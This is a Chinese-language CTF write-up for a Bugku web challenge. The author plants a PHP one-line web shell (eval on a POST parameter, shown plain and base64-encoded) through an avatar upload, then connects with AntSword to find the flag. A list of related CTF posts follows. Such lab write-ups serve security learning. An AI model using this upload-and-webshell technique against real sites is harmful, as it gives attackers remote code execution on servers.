Bugku CTF 每日一题 xxx二手交易市场
xxx二手交易市场
打开看见是一个网站 所以从零开始测试
1.首先点开一个商品 往下滑有回复框 但是要先注册 所以等注册了再来测试
2.搜索栏也不能用 暂时放过,不过在二手界面发现了一个搜索框 输入一般的sql查询发现好像过滤了# ‘’“”等
3.求购 公告栏也没什么可以利用的
4.发现登录注册框 先爆破一下,不过有验证码爆破不行还要识别验证码,先放放
5.先注册一个账号
看了一下功能,先上个商品看看?
额 要管理员验证 走不通
邮箱签名那块也是有输入验证
再去看看回复框
好像没什么用
再翻了翻 还有上传头像可以用 打开burpsuite
随便传一个 发现用了base64 先解码看看
发现前面不对劲 有%好像是unicode,所以先丢进unicode
参考链接:https://www.cnblogs.com/wsh-ning/p/7463101.html1.形如:"data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/sABFEdWNreQABAAQAAAA......==" 的字符串就是base64。2.data:image/jpeg;base64,为头部信息,其余为图片编码。3.使用base64_decode对编码内容进行解码。4. 编码后的数据比原始数据略长,为原来的4/3。因为:三个字节有24个位元,就可以刚好对应于4个Base64单元,即3个字节需要用4个Base64的可打印字符来表示。
所以在后面把图片加一句话码并且要base64编码
用蚁剑连一下 发现返回数据为空???
研究了许久后发现 tnnd base64网站编译出错了
用下面这个base64就能过
<?php @eval($_POST['cmd']);?>PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=
用这个就过不了
JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1QiUyN2NtZCUyNyU1RCUyOSUzQiUzRiUzRQ==
过了之后用蚁剑连接 然后用find命令直接找
找到flag
Bugku CTF 每日一题 xxx二手交易市场相关推荐
- Bugku CTF每日一题 可爱的故事
可爱的故事 这题给我整无语了 建议放到crypto分区 一段看不懂的文字 用winhex等也找不到有效线索 研究了半天无奈看了下评论 发现是某原的一种文字 (流汗黄豆)只能说不好评价哈 根据提示·找对 ...
- Bugku CTF 每日一题 where is flag
where is flag 番外篇 解压得到两个压缩包 第一个压缩包key可以解压 第二个压缩包出师表要密码才能解压 打开第一个压缩包解压发现出师表中有些残缺,比如 先帝创业未办AAAAA 而且下一段 ...
- Bugku CTF每日一题 乌云邀请码
乌云邀请码 打开发现是张图片,用winhex打开发现很多和普通图片不一样的地方 打开属性没发现什么异常 但是在STEGSLOVE打开却发现了异常,RGB都在0位有如下图的异常 于是考虑RGB隐写,但是 ...
- Bugku CTF 每日一题 爆照
爆照 打开是个jpg文件,winhex打开,在最后发现了异常,应该是有压缩包 用binwalk分析一下,发现压缩包,可以用dd命令或者foremost分离 dd if=file.jpg of=11.z ...
- Bugku CTF 每日一题 三色绘恋
三色绘恋 打开是一个压缩包 发现需要密码 用winhex打开后发现有个0900 所以应该是伪加密 09改为00 打开压缩包发现是一张图片 用winhex打开 有异样 猜测是藏了东西 用linux 下的 ...
- Bugku CTF 每日一题 富强民主等
富强民主 一看题目 就知道是核心价值观密码 随便找个网站解码得到就行,随便提供一个吧 http://www.hiencode.com/cvencode.html 多种方法解决 点开发现是个exe 点不 ...
- [CTF] 每日一题汇总
[CTF] 每日一题汇总 WEB 编号 题目 知识点 No.0001 博兹瓦纳-爆破 zip伪加密.CRC校验 No.0002 莫桑比克-php是最好的语言 php伪协议.data协议 No.0003 ...
- Bugku CTF 密码学刷题
Bugku CTF 密码学刷题 前言 一.抄错的字符 二./.- 三.聪明的小羊 四.ok 五.[+-<>] 六.把猪困在猪圈里 七.你喜欢下棋吗 八.小山丘的秘密 九.EN-气泡 十.你 ...
- CTF每日一题之ACII码编码
好久没写了...因为好久没做题了,最近又开始偷懒了,愁人.今天发现了一个新的CTF平台,很有意思,不过缺点是没有中文,不过这没有关系,谁叫我谷歌翻译用的贼6,今天是个签到题,就不多说了. 题目链接:h ...
- BugKu CTF 社工题部分writeup
1.密码 姓名:张三 生日:19970315 就是猜密码吧 zs19970315 2.信息查找 社会工程学基础题目 信息查找 听说bugku.cn 在今日头条上能找到?? 提示:flag为群号码 百度 ...
最新文章
- AI已来,更有未来!科大讯飞全球1024开发者节,这场AI盛会你也可以云参与
- 实模式与保护模式详解二:地址映射
- 计算机游戏的作文,玩电脑游戏作文
- 过度封装的ZeroMQ
- 《JavaScript 高级程序设计》笔记 第7章及以后
- Perl的浅拷贝和深度拷贝
- Java中从String到Long的转换
- 云计算时代下的数据中心运维之路
- 开机时不输入用户名密码直接登录
- 多线程依次接收信息并发送
- centos 最小化安装 补充命令_CentOS7安装后没网络的解决方法
- pdf文档有时打开乱码的解决方案
- c语言编程秒表multisim,用定时器计数器设计一个简单的秒表.docx
- 制造行业IT运维管理解决方案
- DataLoader 和 Dataset
- jmeter快速修改协议、服务器名称或IP、端口号的方法
- PLC编程语言汇总,留言告诉我你会哪一个?
- opencv入门系列教学(五)图像的基本操作(像素值、属性、ROI和边框)
- Andriod界面设计的分辨率和尺寸适配全攻略 转载
- vue 修改模板{{}}标签_vue.js - Vue单文件的template标签
热门文章
- 什么成就了今天的硅谷?
- 高项 真题 问题归纳
- Docker部署ES集群(图文并茂)
- SAP-MM-发票校验基本功能详解
- 升级Nexus 出现小绿人倒地+无命令(no command)解决方案
- [去哪儿]裁减网格纸
- depot_tools/.cipd_bin/vpython3: No such file or directory chromium 编译问题
- MIMO-OFDM1.1无线信道python
- SPI,SPI_DMA,FSMC配置流程
- ctfshow网络迷踪窗外风景wp